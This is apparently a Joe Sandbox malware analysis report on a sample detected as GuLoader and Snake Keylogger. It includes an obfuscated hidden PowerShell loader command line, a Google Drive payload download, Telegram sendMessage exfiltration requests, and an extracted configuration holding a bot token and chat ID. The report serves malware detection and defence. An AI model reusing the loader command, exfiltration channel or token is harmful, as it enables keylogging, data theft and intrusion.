Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
RmIYOfX0yO.exe

Overview

General Information

Sample name:RmIYOfX0yO.exe
renamed because original name is a hash value
Original sample name:f5f3c3a8c7f9f5fb9531fa0d57012ce0869b52b23d05e6c9b7a0220ac917db6d.exe
Analysis ID:1587700
MD5:5e2ff1914fc1f8ebadf282f4096d6fc8
SHA1:77d61bdf0ce63eed5324b56623b878fc3dc79890
SHA256:f5f3c3a8c7f9f5fb9531fa0d57012ce0869b52b23d05e6c9b7a0220ac917db6d
Tags:exeuser-adrian__luca
Infos:

Detection

GuLoader, Snake Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Early bird code injection technique detected
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected GuLoader
Yara detected Snake Keylogger
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Loading BitLocker PowerShell Module
Powershell drops PE file
Queues an APC in another process (thread injection)
Suspicious powershell command line found
Tries to detect the country of the analysis system (by using the IP)
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Msiexec Initiated Connection
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection

Classification

  • System is w10x64
  • RmIYOfX0yO.exe (PID: 7380 cmdline: "C:\Users\user\Desktop\RmIYOfX0yO.exe" MD5: 5E2FF1914FC1F8EBADF282F4096D6FC8)
    • powershell.exe (PID: 7472 cmdline: powershell.exe -windowstyle hidden "$Vulcanological=gc -raw 'C:\Users\user\AppData\Local\magmaet\clenched\Storvildtjagten180.Agg';$Accusor=$Vulcanological.SubString(74166,3);.$Accusor($Vulcanological) " MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7492 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • msiexec.exe (PID: 1480 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"Exfil Mode": "Telegram", "Token": "8179583980:AAG4cdQWaAviOBBhSs3OrT1OX6_IUptNQv8", "Chat_id": "6070006284", "Version": "4.4"}
SourceRuleDescriptionAuthorStrings
00000009.00000002.2578808051.0000000025A81000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
    00000002.00000002.2191615306.000000000D623000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security

      System Summary

      barindex
      Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 142.250.186.78, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 1480, Protocol: tcp, SourceIp: 192.168.2.11, SourceIsIpv6: false, SourcePort: 49981
      Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7472, TargetFilename: C:\Users\user\AppData\Local\magmaet\clenched\RmIYOfX0yO.exe
      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -windowstyle hidden "$Vulcanological=gc -raw 'C:\Users\user\AppData\Local\magmaet\clenched\Storvildtjagten180.Agg';$Accusor=$Vulcanological.SubString(74166,3);.$Accusor($Vulcanological) ", CommandLine: powershell.exe -windowstyle hidden "$Vulcanological=gc -raw 'C:\Users\user\AppData\Local\magmaet\clenched\Storvildtjagten180.Agg';$Accusor=$Vulcanological.SubString(74166,3);.$Accusor($Vulcanological) ", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\RmIYOfX0yO.exe", ParentImage: C:\Users\user\Desktop\RmIYOfX0yO.exe, ParentProcessId: 7380, ParentProcessName: RmIYOfX0yO.exe, ProcessCommandLine: powershell.exe -windowstyle hidden "$Vulcanological=gc -raw 'C:\Users\user\AppData\Local\magmaet\clenched\Storvildtjagten180.Agg';$Accusor=$Vulcanological.SubString(74166,3);.$Accusor($Vulcanological) ", ProcessId: 7472, ProcessName: powershell.exe
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2025-01-10T17:09:16.958454+010028033053Unknown Traffic192.168.2.1149985104.21.80.1443TCP
      2025-01-10T17:09:27.623481+010028033053Unknown Traffic192.168.2.1149997104.21.80.1443TCP
      2025-01-10T17:09:28.856245+010028033053Unknown Traffic192.168.2.1149999104.21.80.1443TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2025-01-10T17:09:14.955499+010028032742Potentially Bad Traffic192.168.2.1149983158.101.44.24280TCP
      2025-01-10T17:09:16.346143+010028032742Potentially Bad Traffic192.168.2.1149983158.101.44.24280TCP
      2025-01-10T17:09:17.539679+010028032742Potentially Bad Traffic192.168.2.1149986158.101.44.24280TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2025-01-10T17:09:09.446890+010028032702Potentially Bad Traffic192.168.2.1149981142.250.186.78443TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2025-01-10T17:09:29.775129+010018100071Potentially Bad Traffic192.168.2.1150000149.154.167.220443TCP

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Source: 00000009.00000002.2578808051.0000000025A81000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Token": "8179583980:AAG4cdQWaAviOBBhSs3OrT1OX6_IUptNQv8", "Chat_id": "6070006284", "Version": "4.4"}
      Source: C:\Users\user\AppData\Local\magmaet\clenched\RmIYOfX0yO.exeReversingLabs: Detection: 65%
      Source: RmIYOfX0yO.exeVirustotal: Detection: 73%Perma Link
      Source: RmIYOfX0yO.exeReversingLabs: Detection: 65%
      Source: Submited SampleIntegrated Neural Analysis Model: Matched 98.6% probability

      Location Tracking

      barindex
      Source: unknownDNS query: name: reallyfreegeoip.org
      Source: RmIYOfX0yO.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.11:49984 version: TLS 1.0
      Source: unknownHTTPS traffic detected: 142.250.186.78:443 -> 192.168.2.11:49981 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.186.33:443 -> 192.168.2.11:49982 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.11:50000 version: TLS 1.2
      Source: RmIYOfX0yO.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: Binary string: indows\System.Core.pdbIw source: powershell.exe, 00000002.00000002.2189051951.0000000008161000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: %lqm.Core.pdb source: powershell.exe, 00000002.00000002.2189051951.0000000008161000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: CallSite.Targetore.pdb source: powershell.exe, 00000002.00000002.2184195240.0000000006F59000.00000004.00000020.00020000.00000000.sdmp
      Source: C:\Users\user\Desktop\RmIYOfX0yO.exeCode function: 0_2_00405974 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405974
      Source: C:\Users\user\Desktop\RmIYOfX0yO.exeCode function: 0_2_004064C6 FindFirstFileW,FindClose,0_2_004064C6
      Source: C:\Users\user\Desktop\RmIYOfX0yO.exeCode function: 0_2_004027FB FindFirstFileW,0_2_004027FB
      Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 02E9F45Dh9_2_02E9F2C0
      Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 02E9F45Dh9_2_02E9F4AC

      Networking

      barindex
      Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.11:50000 -> 149.154.167.220:443
      Source: unknownDNS query: name: api.telegram.org
      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
      Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:216554%0D%0ADate%20and%20Time:%2011/01/2025%20/%2002:20:41%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20216554%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
      Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
      Source: Joe Sandbox ViewIP Address: 158.101.44.242 158.101.44.242
      Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
      Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
      Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
      Source: unknownDNS query: name: checkip.dyndns.org
      Source: unknownDNS query: name: reallyfreegeoip.org
      Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49986 -> 158.101.44.242:80
      Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49983 -> 158.101.44.242:80
      Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.11:49981 -> 142.250.186.78:443
      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:49985 -> 104.21.80.1:443
      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:49997 -> 104.21.80.1:443
      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:49999 -> 104.21.80.1:443
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=106pvcp-FFRq3kk2pQXd-hO-8ZfrGUfIC HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /download?id=106pvcp-FFRq3kk2pQXd-hO-8ZfrGUfIC&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
      Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.11:49984 version: TLS 1.0
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=106pvcp-FFRq3kk2pQXd-hO-8ZfrGUfIC HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /download?id=106pvcp-FFRq3kk2pQXd-hO-8ZfrGUfIC&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
      Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:216554%0D%0ADate%20and%20Time:%2011/01/2025%20/%2002:20:41%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20216554%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
      Source: global trafficDNS traffic detected: DNS query: drive.google.com
      Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
      Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
      Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
      Source: global trafficDNS traffic detected: DNS query: api.telegram.org
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Fri, 10 Jan 2025 16:09:29 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
      Source: msiexec.exe, 00000009.00000002.2578808051.0000000025C30000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2578808051.0000000025B38000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2578808051.0000000025BC7000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2578808051.0000000025BE6000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2578808051.0000000025BF4000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2578808051.0000000025BD8000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2578808051.0000000025C3E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.com
      Source: msiexec.exe, 00000009.00000002.2578808051.0000000025B29000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2578808051.0000000025C30000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2578808051.0000000025B38000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2578808051.0000000025BC7000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2578808051.0000000025C02000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2578808051.0000000025BE6000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2578808051.0000000025BF4000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2578808051.0000000025BD8000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2578808051.0000000025B7B000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2578808051.0000000025C3E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
      Source: RmIYOfX0yO.exe, 00000000.00000000.1293647794.000000000040A000.00000008.00000001.01000000.00000003.sdmp, RmIYOfX0yO.exe, 00000000.00000002.1357335472.000000000040A000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
      Source: powershell.exe, 00000002.00000002.2182314572.0000000005919000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
      Source: powershell.exe, 00000002.00000002.2178786128.0000000004A06000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
      Source: msiexec.exe, 00000009.00000002.2578808051.0000000025C30000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2578808051.0000000025BC7000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2578808051.0000000025BE6000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2578808051.0000000025BF4000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2578808051.0000000025BD8000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2578808051.0000000025C3E000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2578808051.0000000025B50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.org
      Source: powershell.exe, 00000002.00000002.2178786128.0000000004A06000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
      Source: powershell.exe, 00000002.00000002.2178786128.00000000048B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
      Source: powershell.exe, 00000002.00000002.2178786128.0000000004A06000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
      Source: powershell.exe, 00000002.00000002.2178786128.0000000004A06000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
      Source: powershell.exe, 00000002.00000002.2178315725.0000000002CC7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2188167978.0000000008022000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co
      Source: powershell.exe, 00000002.00000002.2178315725.0000000002CC7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.cod
      Source: powershell.exe, 00000002.00000002.2178786128.00000000048B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lBlq
      Source: powershell.exe, 00000002.00000002.2178786128.0000000004A06000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
      Source: msiexec.exe, 00000009.00000003.2338030802.0000000009D89000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
      Source: powershell.exe, 00000002.00000002.2182314572.0000000005919000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
      Source: powershell.exe, 00000002.00000002.2182314572.0000000005919000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
      Source: powershell.exe, 00000002.00000002.2182314572.0000000005919000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
      Source: msiexec.exe, 00000009.00000002.2564635002.0000000009D48000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
      Source: msiexec.exe, 00000009.00000003.2338030802.0000000009D89000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2564635002.0000000009D37000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2564635002.0000000009D48000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=106pvcp-FFRq3kk2pQXd-hO-8ZfrGUfIC&export=download
      Source: msiexec.exe, 00000009.00000003.2372781160.0000000009D41000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=106pvcp-FFRq3kk2pQXd-hO-8ZfrGUfIC&export=download~a
      Source: powershell.exe, 00000002.00000002.2178786128.0000000004A06000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
      Source: powershell.exe, 00000002.00000002.2182314572.0000000005919000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
      Source: msiexec.exe, 00000009.00000002.2578808051.0000000025C30000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2578808051.0000000025B38000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2578808051.0000000025BC7000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2578808051.0000000025BE6000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2578808051.0000000025BF4000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2578808051.0000000025BD8000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2578808051.0000000025B7B000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2578808051.0000000025C3E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
      Source: msiexec.exe, 00000009.00000002.2578808051.0000000025B38000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
      Source: msiexec.exe, 00000009.00000002.2578808051.0000000025C3E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
      Source: msiexec.exe, 00000009.00000002.2578808051.0000000025C30000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2578808051.0000000025BC7000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2578808051.0000000025BE6000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2578808051.0000000025BF4000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2578808051.0000000025BD8000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2578808051.0000000025B7B000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2578808051.0000000025C3E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
